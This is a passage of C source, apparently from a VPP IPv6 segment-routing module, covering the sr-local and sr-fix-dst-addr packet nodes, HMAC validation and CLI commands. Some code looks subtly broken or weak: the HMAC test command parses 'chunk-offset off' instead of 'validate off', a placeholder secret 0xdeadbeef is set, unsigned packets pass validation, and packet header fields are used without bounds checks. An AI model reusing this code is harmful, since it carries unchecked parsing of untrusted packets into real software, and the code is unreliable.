  u32 next_index;
  u32 adj_index;
  u8 sr[256];			/* raw copy of (the start of) the SR header */
} sr_fix_addr_trace_t;

/**
 * @brief Formatter for fix address trace
 */
u8 *
format_sr_fix_addr_trace (u8 * s, va_list * args)
{
  CLIB_UNUSED (vlib_main_t * vm) = va_arg (*args, vlib_main_t *);
  CLIB_UNUSED (vlib_node_t * node) = va_arg (*args, vlib_node_t *);
  sr_fix_addr_trace_t *t = va_arg (*args, sr_fix_addr_trace_t *);
  vnet_hw_interface_t *hi = 0;
  ip_adjacency_t *adj;
  ip6_main_t *im = &ip6_main;
  ip_lookup_main_t *lm = &im->lookup_main;
  vnet_main_t *vnm = vnet_get_main ();

  /* Resolve the output hw interface from the traced adjacency, if any */
  if (t->adj_index != ~0)
    {
      adj = ip_get_adjacency (lm, t->adj_index);
      hi = vnet_get_sup_hw_interface (vnm, adj->rewrite_header.sw_if_index);
    }

  s = format (s, "SR-FIX_ADDR: next %s ip6 src %U dst %U\n",
	      (t->next_index == SR_FIX_DST_ADDR_NEXT_DROP)
	      ? "drop" : "output",
	      format_ip6_address, &t->src, format_ip6_address, &t->dst);
  if (t->next_index != SR_FIX_DST_ADDR_NEXT_DROP)
    {
      s = format (s, "%U\n", format_ip6_sr_header, t->sr,
		  1 /* print_hmac */ );
      s = format (s, " output via %s",
		  hi ? (char *) (hi->name) : "Invalid adj");
    }
  return s;
}

/**
 * @brief Fix SR destination address - dual-loop
 *
 * Restores the original packet dst address from the SR segment list
 * (slot 0) before output.  Only the single-buffer loop is active; the
 * dual-buffer loop is compiled out (#if 0).
 *
 * @node sr-fix-dst-addr
 * @param vm vlib_main_t *
 * @param node vlib_node_runtime_t *
 * @param from_frame vlib_frame_t *
 *
 * @return from_frame->n_vectors uword
 */
static uword
sr_fix_dst_addr (vlib_main_t * vm,
		 vlib_node_runtime_t * node, vlib_frame_t * from_frame)
{
  u32 n_left_from, next_index, *from, *to_next;
  ip6_main_t *im = &ip6_main;
  ip_lookup_main_t *lm = &im->lookup_main;

  from = vlib_frame_vector_args (from_frame);
  n_left_from = from_frame->n_vectors;

  next_index = node->cached_next_index;

  while (n_left_from > 0)
    {
      u32 n_left_to_next;

      vlib_get_next_frame (vm, node, next_index, to_next, n_left_to_next);

#if 0
      /* Dual-buffer loop: currently disabled (note the "0 &&" guard too) */
      while (0 && n_left_from >= 4 && n_left_to_next >= 2)
	{
	  u32 bi0, bi1;
	  __attribute__ ((unused)) vlib_buffer_t *b0, *b1;
	  u32 next0 = SR_FIX_DST_ADDR_NEXT_DROP;
	  u32 next1 = SR_FIX_DST_ADDR_NEXT_DROP;

	  /* Prefetch next iteration. */
	  {
	    vlib_buffer_t *p2, *p3;

	    p2 = vlib_get_buffer (vm, from[2]);
	    p3 = vlib_get_buffer (vm, from[3]);

	    vlib_prefetch_buffer_header (p2, LOAD);
	    vlib_prefetch_buffer_header (p3, LOAD);
	  }

	  bi0 = from[0];
	  bi1 = from[1];
	  to_next[0] = bi0;
	  to_next[1] = bi1;
	  from += 2;
	  to_next += 2;
	  n_left_to_next -= 2;
	  n_left_from -= 2;

	  b0 = vlib_get_buffer (vm, bi0);
	  b1 = vlib_get_buffer (vm, bi1);

	  vlib_validate_buffer_enqueue_x2 (vm, node, next_index,
					   to_next, n_left_to_next,
					   bi0, bi1, next0, next1);
	}
#endif

      while (n_left_from > 0 && n_left_to_next > 0)
	{
	  u32 bi0;
	  vlib_buffer_t *b0;
	  ip6_header_t *ip0;
	  ip_adjacency_t *adj0;
	  ip6_sr_header_t *sr0;
	  u32 next0 = SR_FIX_DST_ADDR_NEXT_DROP;
	  ip6_address_t *new_dst0;
	  ethernet_header_t *eh0;

	  bi0 = from[0];
	  to_next[0] = bi0;
	  from += 1;
	  to_next += 1;
	  n_left_from -= 1;
	  n_left_to_next -= 1;

	  b0 = vlib_get_buffer (vm, bi0);

	  /* Next node comes from the adjacency, not a fixed disposition */
	  adj0 =
	    ip_get_adjacency (lm, vnet_buffer (b0)->ip.adj_index[VLIB_TX]);
	  next0 = adj0->mcast_group_index;

	  /* We should be pointing at an Ethernet header... */
	  eh0 = vlib_buffer_get_current (b0);
	  ip0 = (ip6_header_t *) (eh0 + 1);
	  sr0 = (ip6_sr_header_t *) (ip0 + 1);

	  /* We'd better find an SR header... */
	  if (PREDICT_FALSE (ip0->protocol != IPPROTO_IPV6_ROUTE))
	    {
	      b0->error = node->errors[SR_FIX_DST_ERROR_NO_SR_HEADER];
	      goto do_trace0;
	    }
	  else
	    {
	      /*
	       * We get here from sr_rewrite or sr_local, with
	       * sr->segments_left pointing at the (copy of the original) dst
	       * address. Use it, then increment sr0->segments_left.
	       */

	      /* Out of segments? Turf the packet */
	      if (PREDICT_FALSE (sr0->segments_left == 0))
		{
		  b0->error =
		    node->errors[SR_FIX_DST_ERROR_NO_MORE_SEGMENTS];
		  goto do_trace0;
		}

	      /*
	       * Rewrite the packet with the original dst address
	       * We assume that the last segment (in processing order)
	       * contains the original dst address. The list is reversed,
	       * so sr0->segments contains the original dst address.
	       */
	      new_dst0 = sr0->segments;
	      ip0->dst_address.as_u64[0] = new_dst0->as_u64[0];
	      ip0->dst_address.as_u64[1] = new_dst0->as_u64[1];
	    }

	do_trace0:

	  if (PREDICT_FALSE (b0->flags & VLIB_BUFFER_IS_TRACED))
	    {
	      sr_fix_addr_trace_t *t = vlib_add_trace (vm, node,
						       b0, sizeof (*t));
	      t->next_index = next0;
	      t->adj_index = ~0;

	      if (next0 != SR_FIX_DST_ADDR_NEXT_DROP)
		{
		  t->adj_index = vnet_buffer (b0)->ip.adj_index[VLIB_TX];
		  clib_memcpy (t->src.as_u8, ip0->src_address.as_u8,
			       sizeof (t->src.as_u8));
		  clib_memcpy (t->dst.as_u8, ip0->dst_address.as_u8,
			       sizeof (t->dst.as_u8));
		  clib_memcpy (t->sr, sr0, sizeof (t->sr));
		}
	    }

	  vlib_validate_buffer_enqueue_x1 (vm, node, next_index,
					   to_next, n_left_to_next,
					   bi0, next0);
	}

      vlib_put_next_frame (vm, node, next_index, n_left_to_next);
    }
  return from_frame->n_vectors;
}

/* *INDENT-OFF* */
VLIB_REGISTER_NODE (sr_fix_dst_addr_node) = {
  .function = sr_fix_dst_addr,
  .name = "sr-fix-dst-addr",
  /* Takes a vector of packets.
*/ .vector_size = sizeof (u32), .format_trace = format_sr_fix_addr_trace, .format_buffer = format_ip6_sr_header_with_length, .runtime_data_bytes = 0, .n_errors = SR_FIX_DST_N_ERROR, .error_strings = sr_fix_dst_error_strings, .n_next_nodes = SR_FIX_DST_ADDR_N_NEXT, .next_nodes = { #define _(s,n) [SR_FIX_DST_ADDR_NEXT_##s] = n, foreach_sr_fix_dst_addr_next #undef _ }, }; /* *INDENT-ON* */ VLIB_NODE_FUNCTION_MULTIARCH (sr_fix_dst_addr_node, sr_fix_dst_addr) static clib_error_t *sr_init (vlib_main_t * vm) { ip6_sr_main_t *sm = &sr_main; clib_error_t *error = 0; vlib_node_t *ip6_lookup_node, *ip6_rewrite_node; if ((error = vlib_call_init_function (vm, ip_main_init))) return error; if ((error = vlib_call_init_function (vm, ip6_lookup_init))) return error; sm->vlib_main = vm; sm->vnet_main = vnet_get_main (); vec_validate (sm->hmac_keys, 0); sm->hmac_keys[0].shared_secret = (u8 *) 0xdeadbeef; sm->tunnel_index_by_key = hash_create_mem (0, sizeof (ip6_sr_tunnel_key_t), sizeof (uword)); sm->tunnel_index_by_name = hash_create_string (0, sizeof (uword)); sm->policy_index_by_policy_name = hash_create_string (0, sizeof (uword)); sm->policy_index_by_multicast_address = hash_create_mem (0, sizeof (ip6_address_t), sizeof (uword)); sm->hmac_key_by_shared_secret = hash_create_string (0, sizeof (uword)); ip6_register_protocol (IPPROTO_IPV6_ROUTE, sr_local_node.index); ip6_lookup_node = vlib_get_node_by_name (vm, (u8 *) "ip6-lookup"); ASSERT (ip6_lookup_node); ip6_rewrite_node = vlib_get_node_by_name (vm, (u8 *) "ip6-rewrite"); ASSERT (ip6_rewrite_node); #if DPDK > 0 /* Cannot run replicate without DPDK */ /* Add a disposition to sr_replicate for the sr multicast replicate node */ sm->ip6_lookup_sr_replicate_index = vlib_node_add_next (vm, ip6_lookup_node->index, sr_replicate_node.index); #endif /* DPDK */ /* Add a disposition to ip6_rewrite for the sr dst address hack node */ sm->ip6_rewrite_sr_next_index = vlib_node_add_next (vm, ip6_rewrite_node->index, sr_fix_dst_addr_node.index); 
OpenSSL_add_all_digests (); sm->md = (void *) EVP_get_digestbyname ("sha1"); sm->hmac_ctx = clib_mem_alloc (sizeof (HMAC_CTX)); sr_dpo_type = dpo_register_new_type (&sr_vft, sr_nodes); return error; } VLIB_INIT_FUNCTION (sr_init); /** * @brief Definition of next-nodes for SR local */ #define foreach_sr_local_next \ _ (ERROR, "error-drop") \ _ (IP6_LOOKUP, "ip6-lookup") /** * @brief Struct for definition of next-nodes for SR local */ typedef enum { #define _(s,n) SR_LOCAL_NEXT_##s, foreach_sr_local_next #undef _ SR_LOCAL_N_NEXT, } sr_local_next_t; /** * @brief Struct for packet trace of SR local */ typedef struct { u8 next_index; u8 sr_valid; ip6_address_t src, dst; u16 length; u8 sr[256]; } sr_local_trace_t; /** * @brief Definition of SR local error-strings */ static char *sr_local_error_strings[] = { #define sr_error(n,s) s, #include "sr_error.def" #undef sr_error }; /** * @brief Struct for definition of SR local error-strings */ typedef enum { #define sr_error(n,s) SR_LOCAL_ERROR_##n, #include "sr_error.def" #undef sr_error SR_LOCAL_N_ERROR, } sr_local_error_t; /** * @brief Format SR local trace * * @param s u8 * * @param args va_list * * * @return s u8 * */ u8 * format_sr_local_trace (u8 * s, va_list * args) { CLIB_UNUSED (vlib_main_t * vm) = va_arg (*args, vlib_main_t *); CLIB_UNUSED (vlib_node_t * node) = va_arg (*args, vlib_node_t *); sr_local_trace_t *t = va_arg (*args, sr_local_trace_t *); s = format (s, "SR-LOCAL: src %U dst %U len %u next_index %d", format_ip6_address, &t->src, format_ip6_address, &t->dst, t->length, t->next_index); if (t->sr_valid) s = format (s, "\n %U", format_ip6_sr_header, t->sr, 1 /* print_hmac */ ); else s = format (s, "\n popped SR header"); return s; } /* $$$$ fixme: smp, don't copy data, cache input, output (maybe) */ /** * @brief Validate the SR HMAC * * @param sm ip6_sr_main_t * * @param ip ip6_header_t * * @param sr ip6_sr_header_t * * * @return retval int */ static int sr_validate_hmac (ip6_sr_main_t * sm, ip6_header_t * ip, 
ip6_sr_header_t * sr) { u32 key_index; static u8 *keybuf; u8 *copy_target; int first_segment; ip6_address_t *addrp; int i; ip6_sr_hmac_key_t *hmac_key; static u8 *signature; u32 sig_len; key_index = sr->hmac_key; /* No signature? Pass... */ if (key_index == 0) return 0; /* We don't know about this key? Fail... */ if (key_index >= vec_len (sm->hmac_keys)) return 1; vec_validate (signature, SHA256_DIGEST_LENGTH - 1); hmac_key = sm->hmac_keys + key_index; vec_reset_length (keybuf); /* pkt ip6 src address */ vec_add2 (keybuf, copy_target, sizeof (ip6_address_t)); clib_memcpy (copy_target, ip->src_address.as_u8, sizeof (ip6_address_t)); /* last segment */ vec_add2 (keybuf, copy_target, 1); copy_target[0] = sr->first_segment; /* octet w/ bit 0 = "clean" flag */ vec_add2 (keybuf, copy_target, 1); copy_target[0] = (sr->flags & clib_host_to_net_u16 (IP6_SR_HEADER_FLAG_CLEANUP)) ? 0x80 : 0; /* hmac key id */ vec_add2 (keybuf, copy_target, 1); copy_target[0] = sr->hmac_key; first_segment = sr->first_segment; addrp = sr->segments; /* segments */ for (i = 0; i <= first_segment; i++) { vec_add2 (keybuf, copy_target, sizeof (ip6_address_t)); clib_memcpy (copy_target, addrp->as_u8, sizeof (ip6_address_t)); addrp++; } if (sm->is_debug) clib_warning ("verify key index %d keybuf: %U", key_index, format_hex_bytes, keybuf, vec_len (keybuf)); /* shared secret */ /* SHA1 is shorter than SHA-256 */ memset (signature, 0, vec_len (signature)); HMAC_CTX_init (sm->hmac_ctx); if (!HMAC_Init (sm->hmac_ctx, hmac_key->shared_secret, vec_len (hmac_key->shared_secret), sm->md)) clib_warning ("barf1"); if (!HMAC_Update (sm->hmac_ctx, keybuf, vec_len (keybuf))) clib_warning ("barf2"); if (!HMAC_Final (sm->hmac_ctx, signature, &sig_len)) clib_warning ("barf3"); HMAC_CTX_cleanup (sm->hmac_ctx); if (sm->is_debug) clib_warning ("computed signature len %d, value %U", sig_len, format_hex_bytes, signature, vec_len (signature)); /* Point at the SHA signature in the packet */ addrp++; if (sm->is_debug) 
    clib_warning ("read signature %U", format_hex_bytes, addrp,
		  SHA256_DIGEST_LENGTH);

  /* 0 == signatures match */
  return memcmp (signature, addrp, SHA256_DIGEST_LENGTH);
}

/**
 * @brief SR local node
 * @node sr-local
 *
 * @param vm vlib_main_t *
 * @param node vlib_node_runtime_t *
 * @param from_frame vlib_frame_t *
 *
 * @return from_frame->n_vectors uword
 */
static uword
sr_local (vlib_main_t * vm, vlib_node_runtime_t * node,
	  vlib_frame_t * from_frame)
{
  u32 n_left_from, next_index, *from, *to_next;
  ip6_sr_main_t *sm = &sr_main;
  /* optional app callback may override the next-node choice */
  u32 (*sr_local_cb) (vlib_main_t *, vlib_node_runtime_t *,
		      vlib_buffer_t *, ip6_header_t *, ip6_sr_header_t *);
  sr_local_cb = sm->sr_local_cb;

  from = vlib_frame_vector_args (from_frame);
  n_left_from = from_frame->n_vectors;

  next_index = node->cached_next_index;

  while (n_left_from > 0)
    {
      u32 n_left_to_next;

      vlib_get_next_frame (vm, node, next_index, to_next, n_left_to_next);

      /* Dual loop: process packets two at a time */
      while (n_left_from >= 4 && n_left_to_next >= 2)
	{
	  u32 bi0, bi1;
	  vlib_buffer_t *b0, *b1;
	  ip6_header_t *ip0, *ip1;
	  ip6_sr_header_t *sr0, *sr1;
	  ip6_address_t *new_dst0, *new_dst1;
	  u32 next0 = SR_LOCAL_NEXT_IP6_LOOKUP;
	  u32 next1 = SR_LOCAL_NEXT_IP6_LOOKUP;

	  /* Prefetch next iteration. */
	  {
	    vlib_buffer_t *p2, *p3;

	    p2 = vlib_get_buffer (vm, from[2]);
	    p3 = vlib_get_buffer (vm, from[3]);

	    vlib_prefetch_buffer_header (p2, LOAD);
	    vlib_prefetch_buffer_header (p3, LOAD);

	    CLIB_PREFETCH (p2->data, 2 * CLIB_CACHE_LINE_BYTES, LOAD);
	    CLIB_PREFETCH (p3->data, 2 * CLIB_CACHE_LINE_BYTES, LOAD);
	  }

	  bi0 = from[0];
	  bi1 = from[1];
	  to_next[0] = bi0;
	  to_next[1] = bi1;
	  from += 2;
	  to_next += 2;
	  n_left_to_next -= 2;
	  n_left_from -= 2;

	  /* ---- packet 0 ---- */
	  b0 = vlib_get_buffer (vm, bi0);
	  ip0 = vlib_buffer_get_current (b0);
	  sr0 = (ip6_sr_header_t *) (ip0 + 1);

	  if (PREDICT_FALSE (sr0->type != ROUTING_HEADER_TYPE_SR))
	    {
	      next0 = SR_LOCAL_NEXT_ERROR;
	      b0->error =
		node->errors[SR_LOCAL_ERROR_BAD_ROUTING_HEADER_TYPE];
	      goto do_trace0;
	    }

	  /* Out of segments? Turf the packet */
	  if (PREDICT_FALSE (sr0->segments_left == 0))
	    {
	      next0 = SR_LOCAL_NEXT_ERROR;
	      b0->error = node->errors[SR_LOCAL_ERROR_NO_MORE_SEGMENTS];
	      goto do_trace0;
	    }

	  if (PREDICT_FALSE (sm->validate_hmac))
	    {
	      if (sr_validate_hmac (sm, ip0, sr0))
		{
		  next0 = SR_LOCAL_NEXT_ERROR;
		  b0->error = node->errors[SR_LOCAL_ERROR_HMAC_INVALID];
		  goto do_trace0;
		}
	    }

	  next0 = sr_local_cb ? sr_local_cb (vm, node, b0, ip0, sr0) : next0;

	  /*
	   * To suppress rewrite, return ~SR_LOCAL_NEXT_xxx
	   */
	  if (PREDICT_FALSE (next0 & 0x80000000))
	    {
	      next0 ^= 0xFFFFFFFF;	/* undo the callback's complement */
	      if (PREDICT_FALSE (next0 == SR_LOCAL_NEXT_ERROR))
		b0->error = node->errors[SR_LOCAL_ERROR_APP_CALLBACK];
	    }
	  else
	    {
	      u32 segment_index0;
	      segment_index0 = sr0->segments_left - 1;

	      /* Rewrite the packet */
	      new_dst0 = (ip6_address_t *) (sr0->segments + segment_index0);
	      ip0->dst_address.as_u64[0] = new_dst0->as_u64[0];
	      ip0->dst_address.as_u64[1] = new_dst0->as_u64[1];

	      if (PREDICT_TRUE (sr0->segments_left > 0))
		sr0->segments_left -= 1;
	    }

	  /* End of the path. Clean up the SR header, or not */
	  if (PREDICT_FALSE (sr0->segments_left == 0 &&
			     (sr0->flags &
			      clib_host_to_net_u16
			      (IP6_SR_HEADER_FLAG_CLEANUP))))
	    {
	      u64 *copy_dst0, *copy_src0;
	      u16 new_l0;
	      /*
	       * Copy the ip6 header right by the (real) length of the
	       * sr header. Here's another place which assumes that
	       * the sr header is the only extension header.
	       */
	      ip0->protocol = sr0->protocol;
	      /* SR header length field counts 8-byte units, excl. first */
	      vlib_buffer_advance (b0, (sr0->length + 1) * 8);

	      new_l0 = clib_net_to_host_u16 (ip0->payload_length) -
		(sr0->length + 1) * 8;
	      ip0->payload_length = clib_host_to_net_u16 (new_l0);

	      copy_src0 = (u64 *) ip0;
	      copy_dst0 = copy_src0 + (sr0->length + 1);

	      /* move the 40-byte ip6 header (5 u64s), highest word first */
	      copy_dst0[4] = copy_src0[4];
	      copy_dst0[3] = copy_src0[3];
	      copy_dst0[2] = copy_src0[2];
	      copy_dst0[1] = copy_src0[1];
	      copy_dst0[0] = copy_src0[0];

	      sr0 = 0;		/* header popped; trace records sr_valid = 0 */
	    }

	do_trace0:
	  if (PREDICT_FALSE (b0->flags & VLIB_BUFFER_IS_TRACED))
	    {
	      sr_local_trace_t *tr = vlib_add_trace (vm, node,
						     b0, sizeof (*tr));
	      clib_memcpy (tr->src.as_u8, ip0->src_address.as_u8,
			   sizeof (tr->src.as_u8));
	      clib_memcpy (tr->dst.as_u8, ip0->dst_address.as_u8,
			   sizeof (tr->dst.as_u8));
	      tr->length = vlib_buffer_length_in_chain (vm, b0);
	      tr->next_index = next0;
	      tr->sr_valid = sr0 != 0;
	      if (tr->sr_valid)
		clib_memcpy (tr->sr, sr0, sizeof (tr->sr));
	    }

	  /* ---- packet 1: same processing as packet 0 ---- */
	  b1 = vlib_get_buffer (vm, bi1);
	  ip1 = vlib_buffer_get_current (b1);
	  sr1 = (ip6_sr_header_t *) (ip1 + 1);

	  if (PREDICT_FALSE (sr1->type != ROUTING_HEADER_TYPE_SR))
	    {
	      next1 = SR_LOCAL_NEXT_ERROR;
	      b1->error =
		node->errors[SR_LOCAL_ERROR_BAD_ROUTING_HEADER_TYPE];
	      goto do_trace1;
	    }

	  /* Out of segments? Turf the packet */
	  if (PREDICT_FALSE (sr1->segments_left == 0))
	    {
	      next1 = SR_LOCAL_NEXT_ERROR;
	      b1->error = node->errors[SR_LOCAL_ERROR_NO_MORE_SEGMENTS];
	      goto do_trace1;
	    }

	  if (PREDICT_FALSE (sm->validate_hmac))
	    {
	      if (sr_validate_hmac (sm, ip1, sr1))
		{
		  next1 = SR_LOCAL_NEXT_ERROR;
		  b1->error = node->errors[SR_LOCAL_ERROR_HMAC_INVALID];
		  goto do_trace1;
		}
	    }

	  next1 = sr_local_cb ? sr_local_cb (vm, node, b1, ip1, sr1) : next1;

	  /*
	   * To suppress rewrite, return ~SR_LOCAL_NEXT_xxx
	   */
	  if (PREDICT_FALSE (next1 & 0x80000000))
	    {
	      next1 ^= 0xFFFFFFFF;
	      if (PREDICT_FALSE (next1 == SR_LOCAL_NEXT_ERROR))
		b1->error = node->errors[SR_LOCAL_ERROR_APP_CALLBACK];
	    }
	  else
	    {
	      u32 segment_index1;
	      segment_index1 = sr1->segments_left - 1;

	      /* Rewrite the packet */
	      new_dst1 = (ip6_address_t *) (sr1->segments + segment_index1);
	      ip1->dst_address.as_u64[0] = new_dst1->as_u64[0];
	      ip1->dst_address.as_u64[1] = new_dst1->as_u64[1];

	      if (PREDICT_TRUE (sr1->segments_left > 0))
		sr1->segments_left -= 1;
	    }

	  /* End of the path. Clean up the SR header, or not */
	  if (PREDICT_FALSE (sr1->segments_left == 0 &&
			     (sr1->flags &
			      clib_host_to_net_u16
			      (IP6_SR_HEADER_FLAG_CLEANUP))))
	    {
	      u64 *copy_dst1, *copy_src1;
	      u16 new_l1;
	      /*
	       * Copy the ip6 header right by the (real) length of the
	       * sr header. Here's another place which assumes that
	       * the sr header is the only extension header.
	       */
	      ip1->protocol = sr1->protocol;
	      vlib_buffer_advance (b1, (sr1->length + 1) * 8);

	      new_l1 = clib_net_to_host_u16 (ip1->payload_length) -
		(sr1->length + 1) * 8;
	      ip1->payload_length = clib_host_to_net_u16 (new_l1);

	      copy_src1 = (u64 *) ip1;
	      copy_dst1 = copy_src1 + (sr1->length + 1);

	      copy_dst1[4] = copy_src1[4];
	      copy_dst1[3] = copy_src1[3];
	      copy_dst1[2] = copy_src1[2];
	      copy_dst1[1] = copy_src1[1];
	      copy_dst1[0] = copy_src1[0];

	      sr1 = 0;
	    }

	do_trace1:
	  if (PREDICT_FALSE (b1->flags & VLIB_BUFFER_IS_TRACED))
	    {
	      sr_local_trace_t *tr = vlib_add_trace (vm, node,
						     b1, sizeof (*tr));
	      clib_memcpy (tr->src.as_u8, ip1->src_address.as_u8,
			   sizeof (tr->src.as_u8));
	      clib_memcpy (tr->dst.as_u8, ip1->dst_address.as_u8,
			   sizeof (tr->dst.as_u8));
	      tr->length = vlib_buffer_length_in_chain (vm, b1);
	      tr->next_index = next1;
	      tr->sr_valid = sr1 != 0;
	      if (tr->sr_valid)
		clib_memcpy (tr->sr, sr1, sizeof (tr->sr));
	    }

	  vlib_validate_buffer_enqueue_x2 (vm, node, next_index,
					   to_next, n_left_to_next,
					   bi0, bi1, next0, next1);
	}

      /* Single loop: leftover packets, identical processing */
      while (n_left_from > 0 && n_left_to_next > 0)
	{
	  u32 bi0;
	  vlib_buffer_t *b0;
	  ip6_header_t *ip0 = 0;
	  ip6_sr_header_t *sr0;
	  ip6_address_t *new_dst0;
	  u32 next0 = SR_LOCAL_NEXT_IP6_LOOKUP;

	  bi0 = from[0];
	  to_next[0] = bi0;
	  from += 1;
	  to_next += 1;
	  n_left_from -= 1;
	  n_left_to_next -= 1;

	  b0 = vlib_get_buffer (vm, bi0);
	  ip0 = vlib_buffer_get_current (b0);
	  sr0 = (ip6_sr_header_t *) (ip0 + 1);

	  if (PREDICT_FALSE (sr0->type != ROUTING_HEADER_TYPE_SR))
	    {
	      next0 = SR_LOCAL_NEXT_ERROR;
	      b0->error =
		node->errors[SR_LOCAL_ERROR_BAD_ROUTING_HEADER_TYPE];
	      goto do_trace;
	    }

	  /* Out of segments? Turf the packet */
	  if (PREDICT_FALSE (sr0->segments_left == 0))
	    {
	      next0 = SR_LOCAL_NEXT_ERROR;
	      b0->error = node->errors[SR_LOCAL_ERROR_NO_MORE_SEGMENTS];
	      goto do_trace;
	    }

	  if (PREDICT_FALSE (sm->validate_hmac))
	    {
	      if (sr_validate_hmac (sm, ip0, sr0))
		{
		  next0 = SR_LOCAL_NEXT_ERROR;
		  b0->error = node->errors[SR_LOCAL_ERROR_HMAC_INVALID];
		  goto do_trace;
		}
	    }

	  next0 = sr_local_cb ? sr_local_cb (vm, node, b0, ip0, sr0) : next0;

	  /*
	   * To suppress rewrite, return ~SR_LOCAL_NEXT_xxx
	   */
	  if (PREDICT_FALSE (next0 & 0x80000000))
	    {
	      next0 ^= 0xFFFFFFFF;
	      if (PREDICT_FALSE (next0 == SR_LOCAL_NEXT_ERROR))
		b0->error = node->errors[SR_LOCAL_ERROR_APP_CALLBACK];
	    }
	  else
	    {
	      u32 segment_index0;
	      segment_index0 = sr0->segments_left - 1;

	      /* Rewrite the packet */
	      new_dst0 = (ip6_address_t *) (sr0->segments + segment_index0);
	      ip0->dst_address.as_u64[0] = new_dst0->as_u64[0];
	      ip0->dst_address.as_u64[1] = new_dst0->as_u64[1];

	      if (PREDICT_TRUE (sr0->segments_left > 0))
		sr0->segments_left -= 1;
	    }

	  /* End of the path. Clean up the SR header, or not */
	  if (PREDICT_FALSE (sr0->segments_left == 0 &&
			     (sr0->flags &
			      clib_host_to_net_u16
			      (IP6_SR_HEADER_FLAG_CLEANUP))))
	    {
	      u64 *copy_dst0, *copy_src0;
	      u16 new_l0;
	      /*
	       * Copy the ip6 header right by the (real) length of the
	       * sr header. Here's another place which assumes that
	       * the sr header is the only extension header.
	       */
	      ip0->protocol = sr0->protocol;
	      vlib_buffer_advance (b0, (sr0->length + 1) * 8);

	      new_l0 = clib_net_to_host_u16 (ip0->payload_length) -
		(sr0->length + 1) * 8;
	      ip0->payload_length = clib_host_to_net_u16 (new_l0);

	      copy_src0 = (u64 *) ip0;
	      copy_dst0 = copy_src0 + (sr0->length + 1);

	      copy_dst0[4] = copy_src0[4];
	      copy_dst0[3] = copy_src0[3];
	      copy_dst0[2] = copy_src0[2];
	      copy_dst0[1] = copy_src0[1];
	      copy_dst0[0] = copy_src0[0];

	      sr0 = 0;
	    }

	do_trace:
	  if (PREDICT_FALSE (b0->flags & VLIB_BUFFER_IS_TRACED))
	    {
	      sr_local_trace_t *tr = vlib_add_trace (vm, node,
						     b0, sizeof (*tr));
	      clib_memcpy (tr->src.as_u8, ip0->src_address.as_u8,
			   sizeof (tr->src.as_u8));
	      clib_memcpy (tr->dst.as_u8, ip0->dst_address.as_u8,
			   sizeof (tr->dst.as_u8));
	      tr->length = vlib_buffer_length_in_chain (vm, b0);
	      tr->next_index = next0;
	      tr->sr_valid = sr0 != 0;
	      if (tr->sr_valid)
		clib_memcpy (tr->sr, sr0, sizeof (tr->sr));
	    }

	  vlib_validate_buffer_enqueue_x1 (vm, node, next_index,
					   to_next, n_left_to_next,
					   bi0, next0);
	}

      vlib_put_next_frame (vm, node, next_index, n_left_to_next);
    }

  vlib_node_increment_counter (vm, sr_local_node.index,
			       SR_LOCAL_ERROR_PKTS_PROCESSED,
			       from_frame->n_vectors);
  return from_frame->n_vectors;
}

/* *INDENT-OFF* */
VLIB_REGISTER_NODE (sr_local_node, static) =
{
  .function = sr_local,
  .name = "sr-local",
  /* Takes a vector of packets.
*/ .vector_size = sizeof (u32), .format_trace = format_sr_local_trace, .runtime_data_bytes = 0, .n_errors = SR_LOCAL_N_ERROR, .error_strings = sr_local_error_strings, .n_next_nodes = SR_LOCAL_N_NEXT, .next_nodes = { #define _(s,n) [SR_LOCAL_NEXT_##s] = n, foreach_sr_local_next #undef _ }, }; /* *INDENT-ON* */ VLIB_NODE_FUNCTION_MULTIARCH (sr_local_node, sr_local) ip6_sr_main_t *sr_get_main (vlib_main_t * vm) { vlib_call_init_function (vm, sr_init); ASSERT (sr_local_node.index); return &sr_main; } /** * @brief CLI parser for SR fix destination rewrite node * * @param vm vlib_main_t * * @param input unformat_input_t * * @param cmd vlib_cli_command_t * * * @return error clib_error_t * */ static clib_error_t * set_ip6_sr_rewrite_fn (vlib_main_t * vm, unformat_input_t * input, vlib_cli_command_t * cmd) { fib_prefix_t pfx = { .fp_proto = FIB_PROTOCOL_IP6, .fp_len = 128, }; u32 fib_index = 0; u32 fib_id = 0; u32 adj_index; ip_adjacency_t *adj; vnet_hw_interface_t *hi; u32 sw_if_index; ip6_sr_main_t *sm = &sr_main; vnet_main_t *vnm = vnet_get_main (); fib_node_index_t fei; if (!unformat (input, "%U", unformat_ip6_address, &pfx.fp_addr.ip6)) return clib_error_return (0, "ip6 address missing in '%U'", format_unformat_error, input); if (unformat (input, "rx-table-id %d", &fib_id)) { fib_index = fib_table_id_find_fib_index (FIB_PROTOCOL_IP6, fib_id); if (fib_index == ~0) return clib_error_return (0, "fib-id %d not found", fib_id); } fei = fib_table_lookup_exact_match (fib_index, &pfx); if (FIB_NODE_INDEX_INVALID == fei) return clib_error_return (0, "no match for %U", format_ip6_address, &pfx.fp_addr.ip6); adj_index = fib_entry_get_adj_for_source (fei, FIB_SOURCE_SR); if (ADJ_INDEX_INVALID == adj_index) return clib_error_return (0, "%U not SR sourced", format_ip6_address, &pfx.fp_addr.ip6); adj = adj_get (adj_index); if (adj->lookup_next_index != IP_LOOKUP_NEXT_REWRITE) return clib_error_return (0, "%U unresolved (not a rewrite adj)", format_ip6_address, &pfx.fp_addr.ip6); 
adj->rewrite_header.next_index = sm->ip6_rewrite_sr_next_index; sw_if_index = adj->rewrite_header.sw_if_index; hi = vnet_get_sup_hw_interface (vnm, sw_if_index); adj->rewrite_header.node_index = sr_fix_dst_addr_node.index; /* $$$$$ hack... steal the mcast group index */ adj->mcast_group_index = vlib_node_add_next (vm, sr_fix_dst_addr_node.index, hi->output_node_index); return 0; } /* *INDENT-OFF* */ VLIB_CLI_COMMAND (set_ip6_sr_rewrite, static) = { .path = "set ip6 sr rewrite", .short_help = "set ip6 sr rewrite <ip6-address> [fib-id <id>]", .function = set_ip6_sr_rewrite_fn, }; /* *INDENT-ON* */ /** * @brief Register a callback routine to set next0 in sr_local * * @param cb void * */ void vnet_register_sr_app_callback (void *cb) { ip6_sr_main_t *sm = &sr_main; sm->sr_local_cb = cb; } /** * @brief Test routine for validation of HMAC */ static clib_error_t * test_sr_hmac_validate_fn (vlib_main_t * vm, unformat_input_t * input, vlib_cli_command_t * cmd) { ip6_sr_main_t *sm = &sr_main; if (unformat (input, "validate on")) sm->validate_hmac = 1; else if (unformat (input, "chunk-offset off")) sm->validate_hmac = 0; else return clib_error_return (0, "expected validate on|off in '%U'", format_unformat_error, input); vlib_cli_output (vm, "hmac signature validation %s", sm->validate_hmac ? "on" : "off"); return 0; } /* *INDENT-OFF* */ VLIB_CLI_COMMAND 